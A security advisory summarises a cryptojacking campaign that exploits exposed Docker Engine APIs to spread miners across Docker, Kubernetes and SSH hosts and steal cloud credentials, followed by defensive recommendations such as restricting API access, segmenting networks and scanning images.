Summary:
A recent discovery by Datadog Security Research has unveiled a new cryptojacking campaign targeting Docker and Kubernetes, two widely used platforms for containerized development. The attackers exploit vulnerable Docker Engine APIs exposed to the internet to deploy a cryptocurrency miner on compromised containers. The campaign then utilizes additional malicious scripts to achieve lateral movement across the network, compromising other Docker hosts, Kubernetes deployments, and even SSH servers.

The attacker leverages automated scanning tools to identify vulnerable Docker endpoints and then spawn containers that execute malicious scripts to retrieve and launch the cryptocurrency miner. These scripts are also designed to spread the malware to other systems on the network by scanning for additional Docker and Kubernetes instances with exposed APIs. Furthermore, the campaign targets SSH servers, compromising them and adding a backdoor for persistent access. The attackers also steal credentials related to various cloud services, including AWS, Google Cloud, and Samba, from the compromised systems. The attackers exploit poorly secured Docker configurations to gain initial access, and then weaponize containerization features to orchestrate their attacks and establish a foothold within the target network. The use of automated scanning tools and the ability to switch between different container images hosted on Docker Hub demonstrates the sophistication level of this campaign.

Security Officer Comments:
This incident demonstrates the critical need for organizations to prioritize the security of their containerized environments like Docker and Kubernetes because they remain fruitful targets. The utilization of payloads in the campaign that are dedicated to lateral movement indicates the adversary's familiarity with how Docker and Kubernetes instances are deployed in cloud environments and suggests they know of common misconfigurations in these platform instances. Attacks like these rely on exploiting public-facing Docker API endpoints to deploy their payloads, making it likely that these attacks are opportunistic, not targeted. Although the chances of initial access are slim, Despite this, the malware’s capability to spread rapidly emphasizes the importance of restricting access to Docker Engine APIs, employing strong authentication, segmenting container networks from the rest of the enterprise, and regularly monitoring for suspicious activity are still encouraged.

Suggested Corrections:
IOCs for this campaign are published here.

Regularly Review Network Configurations: Periodically review your network configurations to ensure that only authorized traffic can access your Docker instance.

• If you're using a cloud provider, create a VPC and place your Docker instance within it. This will isolate your instance from the public internet, making it less accessible to attackers.
• Create ACLs to restrict inbound and outbound traffic to your Docker instance. Allow only necessary traffic, such as from your management network or other trusted sources.

Restrict Docker Engine API Access:

• Limit access to the Docker Engine API to only authorized users and applications.
• Use network segmentation to isolate Docker hosts from the public internet.
• Implement strong authentication mechanisms, such as multi-factor authentication (MFA), for accessing the Docker Engine API.

Monitor for Suspicious Activity:

• Use security tools to monitor for anomalous activity, such as unusual network traffic, unauthorized container creation, or cryptocurrency mining processes.
• Regularly review logs and audit trails for signs of compromise.

Implement Container Image Scanning:

• Scan container images for malware and vulnerabilities before deploying them.
• Use trusted container registries and enforce image signing to ensure the integrity of container images.

Restrict Credential Exposure:

• Avoid storing sensitive credentials, such as API keys and passwords, within container images or on compromised systems.
• Use secure credential management solutions to store and manage credentials.

Link(s):
https://thehackernews.com/2024/10/new-cryptojacking-attack-targets-docker.html

https://securitylabs.datadoghq.com/articles/threat-actors-leveraging-docker-swarm-kubernetes-mine-cryptocurrency/